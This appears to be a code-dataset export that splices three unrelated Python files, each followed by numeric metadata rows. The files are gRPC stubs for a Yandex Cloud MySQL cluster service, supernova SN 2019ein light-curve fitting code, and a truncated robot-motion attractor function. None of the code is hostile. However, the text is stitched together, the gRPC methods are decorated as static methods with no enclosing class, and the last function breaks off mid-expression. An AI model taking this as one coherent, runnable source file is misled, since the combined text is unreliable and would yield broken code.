def Move(request,
         target,
         options=(),
         channel_credentials=None,
         call_credentials=None,
         insecure=False,
         compression=None,
         wait_for_ready=None,
         timeout=None,
         metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/Move.

    Serializes a MoveClusterRequest, returns a long-running Operation.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Move',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.MoveClusterRequest.SerializeToString,
        yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Backup(request,
           target,
           options=(),
           channel_credentials=None,
           call_credentials=None,
           insecure=False,
           compression=None,
           wait_for_ready=None,
           timeout=None,
           metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/Backup.

    Serializes a BackupClusterRequest, returns a long-running Operation.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Backup',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.BackupClusterRequest.SerializeToString,
        yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Restore(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/Restore.

    Serializes a RestoreClusterRequest, returns a long-running Operation.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/Restore',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.RestoreClusterRequest.SerializeToString,
        yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def RescheduleMaintenance(request,
                          target,
                          options=(),
                          channel_credentials=None,
                          call_credentials=None,
                          insecure=False,
                          compression=None,
                          wait_for_ready=None,
                          timeout=None,
                          metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/RescheduleMaintenance.

    Serializes a RescheduleMaintenanceRequest, returns a long-running Operation.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/RescheduleMaintenance',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.RescheduleMaintenanceRequest.SerializeToString,
        yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def StartFailover(request,
                  target,
                  options=(),
                  channel_credentials=None,
                  call_credentials=None,
                  insecure=False,
                  compression=None,
                  wait_for_ready=None,
                  timeout=None,
                  metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/StartFailover.

    Serializes a StartClusterFailoverRequest, returns a long-running Operation.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/StartFailover',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StartClusterFailoverRequest.SerializeToString,
        yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListLogs(request,
             target,
             options=(),
             channel_credentials=None,
             call_credentials=None,
             insecure=False,
             compression=None,
             wait_for_ready=None,
             timeout=None,
             metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/ListLogs.

    Serializes a ListClusterLogsRequest, returns a ListClusterLogsResponse.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/ListLogs',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterLogsRequest.SerializeToString,
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterLogsResponse.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def StreamLogs(request,
               target,
               options=(),
               channel_credentials=None,
               call_credentials=None,
               insecure=False,
               compression=None,
               wait_for_ready=None,
               timeout=None,
               metadata=None):
    """One-shot unary-STREAM call to /yandex.cloud.mdb.mysql.v1.ClusterService/StreamLogs.

    Serializes a StreamClusterLogsRequest; yields StreamLogRecord messages
    (note: unary_stream, unlike the other unary_unary methods here).
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_stream(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/StreamLogs',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StreamClusterLogsRequest.SerializeToString,
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.StreamLogRecord.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListOperations(request,
                   target,
                   options=(),
                   channel_credentials=None,
                   call_credentials=None,
                   insecure=False,
                   compression=None,
                   wait_for_ready=None,
                   timeout=None,
                   metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/ListOperations.

    Serializes a ListClusterOperationsRequest, returns a ListClusterOperationsResponse.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/ListOperations',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterOperationsRequest.SerializeToString,
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterOperationsResponse.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListBackups(request,
                target,
                options=(),
                channel_credentials=None,
                call_credentials=None,
                insecure=False,
                compression=None,
                wait_for_ready=None,
                timeout=None,
                metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/ListBackups.

    Serializes a ListClusterBackupsRequest, returns a ListClusterBackupsResponse.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/ListBackups',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterBackupsRequest.SerializeToString,
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterBackupsResponse.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListHosts(request,
              target,
              options=(),
              channel_credentials=None,
              call_credentials=None,
              insecure=False,
              compression=None,
              wait_for_ready=None,
              timeout=None,
              metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/ListHosts.

    Serializes a ListClusterHostsRequest, returns a ListClusterHostsResponse.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/ListHosts',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterHostsRequest.SerializeToString,
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.ListClusterHostsResponse.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def AddHosts(request,
             target,
             options=(),
             channel_credentials=None,
             call_credentials=None,
             insecure=False,
             compression=None,
             wait_for_ready=None,
             timeout=None,
             metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/AddHosts.

    Serializes an AddClusterHostsRequest, returns a long-running Operation.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/AddHosts',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.AddClusterHostsRequest.SerializeToString,
        yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateHosts(request,
                target,
                options=(),
                channel_credentials=None,
                call_credentials=None,
                insecure=False,
                compression=None,
                wait_for_ready=None,
                timeout=None,
                metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/UpdateHosts.

    Serializes an UpdateClusterHostsRequest, returns a long-running Operation.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/UpdateHosts',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.UpdateClusterHostsRequest.SerializeToString,
        yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteHosts(request,
                target,
                options=(),
                channel_credentials=None,
                call_credentials=None,
                insecure=False,
                compression=None,
                wait_for_ready=None,
                timeout=None,
                metadata=None):
    """One-shot unary-unary call to /yandex.cloud.mdb.mysql.v1.ClusterService/DeleteHosts.

    Serializes a DeleteClusterHostsRequest, returns a long-running Operation.
    Auto-generated gRPC stub; do not edit by hand.
    """
    return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.mysql.v1.ClusterService/DeleteHosts',
        yandex_dot_cloud_dot_mdb_dot_mysql_dot_v1_dot_cluster__service__pb2.DeleteClusterHostsRequest.SerializeToString,
        yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
        options, channel_credentials,
        insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 53.042996
| 156
| 0.701836
| 3,955
| 38,244
| 6.306953
| 0.044753
| 0.044379
| 0.069035
| 0.083828
| 0.913606
| 0.908475
| 0.904386
| 0.856318
| 0.849703
| 0.808371
| 0
| 0.008588
| 0.232742
| 38,244
| 720
| 157
| 53.116667
| 0.841495
| 0.042647
| 0
| 0.584691
| 1
| 0
| 0.086187
| 0.056937
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068404
| false
| 0
| 0.006515
| 0.032573
| 0.112378
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2dd64babbb4c18695440845f5e49cf6aff62541e
| 18,819
|
py
|
Python
|
fitting/sn2019ein_fitting_GL.py
|
changsuchoi/cspy
|
9fa8f125bed368f636ea19180e742f8304bbc432
|
[
"MIT"
] | null | null | null |
fitting/sn2019ein_fitting_GL.py
|
changsuchoi/cspy
|
9fa8f125bed368f636ea19180e742f8304bbc432
|
[
"MIT"
] | null | null | null |
fitting/sn2019ein_fitting_GL.py
|
changsuchoi/cspy
|
9fa8f125bed368f636ea19180e742f8304bbc432
|
[
"MIT"
] | null | null | null |
def single_powerlaw(t, t0, a, mg0):
    """Single power-law magnitude model: mg0 + 2.5 * a * log10(t - t0).

    t   : epoch (same units as t0); must satisfy t > t0
    t0  : reference (first-light) epoch
    a   : power-law index
    mg0 : magnitude zero point
    """
    import numpy as np
    dt = t - t0
    return mg0 + 2.5 * a * np.log10(dt)
def fit_single(t, mg, mge, initial, maxfev):
    """Least-squares fit of the single power-law model to a light curve.

    t       : time relative to a specific date
    mg      : magnitudes
    mge     : 1-sigma magnitude errors (used as weights, absolute_sigma=True)
    initial : initial guesses for [t0, a, mg0], e.g. [1.5, 2., 16.5]
    maxfev  : maximum number of function evaluations passed to curve_fit

    Returns (popt, pcov) from scipy.optimize.curve_fit.
    """
    from scipy.optimize import curve_fit
    popt, pcov = curve_fit(single_powerlaw, t, mg, sigma=mge, p0=initial,
                           absolute_sigma=True, maxfev=maxfev, check_finite=True)
    # BUG FIX: the original computed the fit but fell off the end of the
    # function, so callers always received None. Return the results.
    return popt, pcov
def planck(wave, temp):
    """Blackbody flux (pi * intensity) in erg cm^-2 s^-1 A^-1.

    wave : wavelength(s) in Angstrom (scalar or array)
    temp : blackbody temperature in Kelvin
    """
    import numpy as np
    w_cm = wave / 1.e8                      # Angstrom -> cm
    # Radiation constants in cgs units.
    c1 = np.float128(3.7417749e-5)          # = 2*pi*h*c*c
    c2 = np.float128(1.4387687)             # = h*c/k
    x = c2 / (w_cm * np.float128(temp))
    flux_per_cm = c1 / (w_cm**5 * (np.exp(x) - 1.))
    return flux_per_cm * 1.e-8              # per cm -> per Angstrom
def fearly2_rw10(td, rstar, band):
    """Shock-heated emission light curve from the Rabinak & Waxman (2011) model.

    Written for the SN 2015F work [2015, M. Im]. The explosion energy is set
    to 10^51 erg, appropriate for a Type Ia SN; change it for other SN types.
    In RW11 the emission comes from the progenitor itself, so `rstar` is the
    progenitor radius. [comments added 2018-05-03, M. Im]

    td    : days since explosion
    rstar : progenitor radius in solar radii
    band  : one of 'U', 'B', 'V', 'R', 'I', 'g', 'r' (effective wavelengths
            from the AIP STELLA Johnson-UBVRI filter-curve tables)

    Returns the AB magnitude (at 10 pc) of the shock-heated emission in `band`.
    """
    import numpy as np
    rstar = np.float128(rstar)
    td = np.float64(td)
    # Progenitor radius in units of 10^10 cm (Rsun = 6.955e10 cm).
    r10 = np.float128(rstar * 6.955)
    Mc = np.float128(1.0 / 1.40)   # ejecta mass in Chandrasekhar-mass units
    Msun = 1.988e33                # g
    c = 2.9979e10                  # cm/s
    eff = 1.0                      # efficiency of conversion of mass to light
    # Difference between E51 and Msun*c^2; cancels so loge51 = log10(eff*Mc).
    dm = np.log10(Msun) + 2. * np.log10(2.9979e10) - 51.
    loge51 = np.log10(eff * Mc) + np.log10(Msun) + 2. * np.log10(c) - 51. - dm
    k02 = np.float128(1.0)         # opacity in units of k/0.2 cm^2 g^-1
    fp = 0.05                      # form factor, 0.031 - 0.13 (RW11)
    # Total early luminosity and effective temperature (RW11 scalings).
    logLt = 40. + np.log10(1.2) + np.log10(r10) + 0.85*loge51 - 0.69*np.log10(Mc) - 0.85*np.log10(k02) - 0.16*np.log10(fp) - 0.35*np.log10(td)
    logTeff = np.log10(4105.) + 0.25*np.log10(r10) + 0.016*loge51 + 0.03*np.log10(Mc) - 0.27*np.log10(k02) - 0.022*np.log10(fp) - 0.47*np.log10(td)
    # BUG FIX: np.float() was removed in NumPy >= 1.24; use a plain float.
    c = 2.9979e8                   # speed of light in m/s (Angstrom->Hz factor below)
    sigb = np.float128(5.6704e-5)  # Stefan-Boltzmann constant in cgs
    logFbb = np.log10(sigb) + 4.*logTeff            # blackbody flux of the early emission
    d10pc = np.float128(10. * 3.0856e18)            # 10 pc in cm
    # Luminosity -> flux at 10 pc, minus the blackbody component.
    fluxm = (logLt - 2.*np.log10(d10pc) - np.log10(4.*np.pi)) - logFbb
    abzero = np.float128(-48.600)  # AB zero point in erg s^-1 cm^-2 Hz^-1
    teff = 10.**(logTeff)
    xw = 1000. + 80.*np.arange(100)                 # wavelength grid, Angstrom
    xw = np.array(xw, dtype='float128')
    bbflux = planck(xw, teff)
    ff = -2.5 * (2.*np.log10(xw) - 10. - np.log10(c))   # Angstrom -> Hertz conversion factor
    mbbflux = -2.5*np.log10(bbflux) + ff + abzero - 2.5*fluxm   # flux -> AB magnitude
    # Spline the sampled spectrum so the magnitude can be read off at any
    # filter effective wavelength (the grid does not hit them exactly).
    from scipy.interpolate import UnivariateSpline
    spl = UnivariateSpline(xw, mbbflux, s=0.2, k=5)
    eff_wave = {'U': 3656., 'B': 4353., 'V': 5477., 'R': 6349., 'I': 8797.,
                'g': 4770., 'r': 6231.}
    if band not in eff_wave:
        # The original silently fell through to an UnboundLocalError here;
        # fail loudly with a clear message instead.
        raise ValueError('unknown band: %r' % (band,))
    return np.float128(spl(eff_wave[band]))
def fearly2_kasen(td, rstar, band):
    """Shock-heated emission light curve from the Kasen (2010) companion model.

    Written for the SN 2015F work [2015, M. Im]. The explosion energy is set
    to 10^51 erg, appropriate for a Type Ia SN; change it for other SN types.
    In K10 the emission comes from the interaction between the companion and
    the ejecta, so `rstar` is the companion radius.
    [comments added 2018-05-03, M. Im]

    td    : days since explosion
    rstar : companion radius in solar radii
    band  : one of 'U', 'B', 'V', 'R', 'I', 'g', 'r' (effective wavelengths
            from the AIP STELLA Johnson-UBVRI filter-curve tables)

    Returns the AB magnitude (at 10 pc) of the shock-heated emission in `band`.

    * Size and mass relation (Kasen 2010):
      1-3 Msun MS        : R* = 1-3 x 10^11 cm
      5-6 Msun MS subgiant: R* = 5 x 10^11 cm
      1-2 Msun red giant  : R* ~ 10^13 cm
    """
    import numpy as np
    rstar = np.float128(rstar)
    td = np.float64(td)
    # Companion radius in units of 10^13 cm (Rsun = 6.955e10 cm).
    r13 = np.float128(rstar * 6.955e-3)
    Mc = np.float128(1.0 / 1.40)   # ejecta mass in Chandrasekhar-mass units
    ke = np.float128(1.0)          # opacity (k02 = 1: e- scattering, fully ionized A/Z=2)
    v9 = np.float128(1.)           # ejecta velocity in 10^9 cm/s
    # Total early luminosity and effective temperature (K10 scalings).
    logLt = 43. + np.log10(2*r13) + 0.25*np.log10(Mc) + (7./4.)*np.log10(v9) + (-0.75)*np.log10(ke) + (-0.5)*np.log10(td)
    logTeff = np.log10(2.5) + 4. + 0.25*np.log10(2.*r13) - (35./36.)*np.log10(ke) - (37./72.)*np.log10(td)
    # BUG FIX: np.float() was removed in NumPy >= 1.24; use a plain float.
    c = 2.9979e8                   # speed of light in m/s (Angstrom->Hz factor below)
    sigb = np.float128(5.6704e-5)  # Stefan-Boltzmann constant in cgs
    logFbb = np.log10(sigb) + 4.*logTeff            # blackbody flux of the early emission
    d10pc = np.float128(10. * 3.0856e18)            # 10 pc in cm
    # Luminosity -> flux at 10 pc, minus the blackbody component.
    fluxm = (logLt - 2.*np.log10(d10pc) - np.log10(4.*np.pi)) - logFbb
    abzero = np.float128(-48.600)  # AB zero point in erg s^-1 cm^-2 Hz^-1
    teff = 10.**(logTeff)
    xw = 1000. + 40.*np.arange(200)                 # wavelength grid, Angstrom
    xw = np.array(xw, dtype='float128')
    bbflux = planck(xw, teff)
    ff = -2.5 * (2.*np.log10(xw) - 10. - np.log10(c))   # Angstrom -> Hertz conversion factor
    mbbflux = -2.5*np.log10(bbflux) + ff + abzero - 2.5*fluxm   # flux -> AB magnitude
    # Spline the sampled spectrum so the magnitude can be read off at any
    # filter effective wavelength (the grid does not hit them exactly).
    from scipy.interpolate import UnivariateSpline
    spl = UnivariateSpline(xw, mbbflux, s=0.2, k=5)
    # CONSISTENCY FIX: the 'B' branch was a bare `if` instead of `elif`,
    # unlike fearly2_rw10; behavior is unchanged (the branches are exclusive).
    eff_wave = {'U': 3656., 'B': 4353., 'V': 5477., 'R': 6349., 'I': 8797.,
                'g': 4770., 'r': 6231.}
    # Other effective wavelengths for reference:
    # I (CTIO/ANDICAM.I_KPNO): 8175.6; J (UKIRT): 12483.0;
    # H (UKIRT): 16313.0; K (UKIRT): 22010.0
    if band not in eff_wave:
        raise ValueError('unknown band: %r' % (band,))
    return np.float128(spl(eff_wave[band]))
def fearly3_kasen(td, rstar, band):
    """Kasen (2010) shock-heated emission magnitude at a single band wavelength.

    Variant of fearly2_kasen: instead of splining a full blackbody spectrum,
    it evaluates the Planck function directly at the band's effective
    wavelength. Intended to relate a measured magnitude to the companion
    size. [2020-08-24, added by G. Lim]

    td    : days since explosion
    rstar : companion radius in solar radii
    band  : one of 'B', 'V', 'R', 'I', 'g', 'r'

    Returns the AB magnitude (at 10 pc) of the shock-heated emission in `band`.

    * Size and mass relation (Kasen 2010):
      1-3 Msun MS: R* = 1-3e11 cm; 5-6 Msun subgiant: R* = 5e11 cm;
      1-2 Msun red giant: R* ~ 1e13 cm.
    """
    import numpy as np
    rstar = np.float128(rstar)
    td = np.float64(td)
    # Companion radius in units of 10^13 cm (Rsun = 6.955e10 cm).
    r13 = np.float128(rstar * 6.955e-3)
    Mc = np.float128(1.0 / 1.40)   # ejecta mass in Chandrasekhar-mass units
    ke = np.float128(1.0)          # opacity (k02 = 1: e- scattering, fully ionized A/Z=2)
    v9 = np.float128(1.)           # ejecta velocity in 10^9 cm/s
    # BUG FIX: np.float() was removed in NumPy >= 1.24; use a plain float.
    c = 2.9979e8                   # speed of light in m/s (Angstrom->Hz factor below)
    sigb = np.float128(5.6704e-5)  # Stefan-Boltzmann constant in cgs
    # Total early luminosity and effective temperature (K10 scalings).
    logLt = 43. + np.log10(2*r13) + 0.25*np.log10(Mc) + (7./4.)*np.log10(v9) + (-0.75)*np.log10(ke) + (-0.5)*np.log10(td)
    logTeff = np.log10(2.5) + 4. + 0.25*np.log10(2.*r13) - (35./36.)*np.log10(ke) - (37./72.)*np.log10(td)
    logFbb = np.log10(sigb) + 4.*logTeff            # bolometric blackbody flux (Ni decay part)
    d10pc = np.float128(10. * 3.0856e18)            # 10 pc in cm
    # Luminosity -> flux at 10 pc, minus the blackbody component.
    fluxm = (logLt - 2.*np.log10(d10pc) - np.log10(4.*np.pi)) - logFbb
    abzero = np.float128(-48.600)  # AB zero point in erg s^-1 cm^-2 Hz^-1
    teff = 10.**(logTeff)
    # Evaluate the Planck function at the band effective wavelength only.
    eff_wave = {'B': 4353., 'V': 5477., 'R': 6349., 'I': 8797.,
                'g': 4770., 'r': 6231.}
    if band not in eff_wave:
        # BUG FIX: an unknown band previously left xw/bbflux undefined and
        # crashed with a NameError below; raise a clear error instead.
        raise ValueError('unknown band: %r' % (band,))
    xw = eff_wave[band]
    bbflux = planck(xw, teff)
    ff = -2.5 * (2.*np.log10(xw) - 10. - np.log10(c))   # Angstrom -> Hertz conversion factor
    mbbflux = -2.5*np.log10(bbflux) + ff + abzero - 2.5*fluxm   # flux -> AB magnitude
    return mbbflux
# NOTE: the triple-quoted block below is a commented-out (string-quoted) draft
# of a MAG_Kasen function. It is a bare module-level string expression: it is
# evaluated and discarded, never executed as code. Kept for reference.
'''
def MAG_Kasen(td, rstar, band):
    """
    fearly2_kasen
    #u.M_sun.cgs # Solar mass
    #c.c.cgs # Speed of light
    """
    import numpy as np
    import astropy.units as u
    from astropy import constants as c
    r13 = (rstar*u.R_sun/1.e+13).value
    eff = 1.0
    Mc = 1.0/1.4
    dm = np.log10(Msun) + 2. * np.log10(2.9979e10) - 51. # Difference btw E51 and Msun*c^2
'''
def lcearly(rstar, band, fig=True):
    """Plot the theoretical early light curve from shock-heated emission.

    Evaluates fearly2_kasen on a time grid of 0.01-20.0 days and plots the
    resulting magnitudes (y-axis inverted, as is conventional for magnitudes).

    rstar : companion radius in solar radii, e.g. 0.1, 1
    band  : filter name, e.g. 'B', 'R'
    fig   : NOTE(review): unused in the visible body, and the local
            `fig, ax1 = plt.subplots(...)` below shadows it — confirm intent.

    Reference radii:
    # Marion+16:  RG = 2e13 cm; 6M MS = 2e12 cm; 2M MS = 5e11 cm
    # Kasen 2010: 1-2M RG ~ 1e13 cm; 5-6M SG = 5e11 cm; 1-3M MS = 1-3e11 cm
    """
    import numpy as np
    import matplotlib.pyplot as plt
    #from lgpy.sn2019ein_fitting import fearly2_kasen
    # (Commented-out alternative rstar grids from the original, using
    #  astropy units, were removed here; see version control if needed.)
    #rstar = [0.1, 0.6, 1.0, round((5.*1.e+11*u.cm).to(u.R_sun).value,3),round((2.*1.e+12*u.cm).to(u.R_sun).value,3), round((2.*1.e+13*u.cm).to(u.R_sun).value,3)]
    # Time grid: 0.01 .. 20.0 days in 0.01-day steps.
    td = 0.01 + 0.01*np.arange(2000)
    y = []
    for i in range(len(td)):
        y_dum = fearly2_kasen(td[i], rstar, band)
        y.append(y_dum)
    #rmg = np.array(y) + 31.16
    #dl=[10.,20.,50.]
    #rmg1=np.array(y) + 5.*np.log10(dl[0])+25.
    #rmg2=np.array(y) + 5.*np.log10(dl[1])+25.
    #rmg3=np.array(y) + 5.*np.log10(dl[2])+25.
    fig, ax1 = plt.subplots(figsize=(6,5))
    # Inverted y limits: brighter (smaller) magnitudes plot upward.
    ax1.set_ylim(np.max(y), np.min(y))
    ax1.plot(td, y, color='black', linewidth=2, linestyle='--')
| 48.627907
| 266
| 0.623678
| 3,178
| 18,819
| 3.669604
| 0.142857
| 0.046218
| 0.029155
| 0.034299
| 0.814783
| 0.807323
| 0.799091
| 0.787858
| 0.782885
| 0.780998
| 0
| 0.121845
| 0.231574
| 18,819
| 386
| 267
| 48.753886
| 0.6846
| 0.547797
| 0
| 0.71519
| 0
| 0
| 0.006402
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044304
| false
| 0
| 0.063291
| 0
| 0.139241
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
932ab3123ffd8956907f55b5d6e22a832304147e
| 59,824
|
py
|
Python
|
py/rmp_fromGDS_attract_xi_M.py
|
YoshimitsuMatsutaIe/manipulator_dynamics
|
587b3cedddd07c2aa09d1195289b0c312e0fc749
|
[
"MIT"
] | null | null | null |
py/rmp_fromGDS_attract_xi_M.py
|
YoshimitsuMatsutaIe/manipulator_dynamics
|
587b3cedddd07c2aa09d1195289b0c312e0fc749
|
[
"MIT"
] | null | null | null |
py/rmp_fromGDS_attract_xi_M.py
|
YoshimitsuMatsutaIe/manipulator_dynamics
|
587b3cedddd07c2aa09d1195289b0c312e0fc749
|
[
"MIT"
] | null | null | null |
"""RMP from GDSのアトラクトにおける曲率項を計算"""
import numpy as np
from math import exp, tanh
def attract_M(x, dx, sigma_alpha, sigma_gamma, w_u, w_l, alpha, epsilon):
    """Compute the attractor inertia matrix for the RMP-from-GDS attractor.

    x  : position vector; assumed shape (3, 1) — indexed as x[0,0]..x[2,0]
    dx : velocity vector; currently unused (the commented-out unpacking below
         suggests it was kept for signature compatibility with attract_xi_M)
    sigma_alpha, sigma_gamma, w_u, w_l, alpha, epsilon : scalar gains /
         metric-shaping parameters of the GDS attractor

    Returns a symmetric 3x3 numpy array M.

    NOTE: the closed-form entries below are machine-generated (symbolically
    derived); do not edit them by hand — regenerate instead.
    """
    x0 = x[0, 0]
    y0 = x[1, 0]
    z0 = x[2, 0]
    x_norm = np.linalg.norm(x)
    # dx0 = dx[0, 0]
    # dy0 = dx[1, 0]
    # dz0 = dx[2, 0]
    M = np.array([
        [(w_l*(1 - exp(-(x_norm**2)**1.0/(2*sigma_gamma**2))) + w_u*exp(-(x_norm**2)**1.0/(2*sigma_gamma**2)))*(epsilon + x0**2*(1 - exp(-2*alpha*(x_norm**2)**0.5))**2*(1 - exp(-(x_norm**2)**1.0/(2*sigma_alpha**2)))*(x_norm**2)**(-1.0)/(1 + exp(-2*alpha*(x_norm**2)**0.5))**2 + exp(-(x_norm**2)**1.0/(2*sigma_alpha**2))), -x0*y0*(-w_l*(exp((x_norm**2)**1.0/(2*sigma_gamma**2)) - 1) - w_u)*(exp((x_norm**2)**1.0/(2*sigma_alpha**2)) - 1)*(x_norm**2)**(-1.0)*exp(-(sigma_alpha**2 + sigma_gamma**2)*(x_norm**2)**1.0/(2*sigma_alpha**2*sigma_gamma**2))*tanh(alpha*(x_norm**2)**0.5)**2, -x0*z0*(-w_l*(exp((x_norm**2)**1.0/(2*sigma_gamma**2)) - 1) - w_u)*(exp((x_norm**2)**1.0/(2*sigma_alpha**2)) - 1)*(x_norm**2)**(-1.0)*exp(-(sigma_alpha**2 + sigma_gamma**2)*(x_norm**2)**1.0/(2*sigma_alpha**2*sigma_gamma**2))*tanh(alpha*(x_norm**2)**0.5)**2],
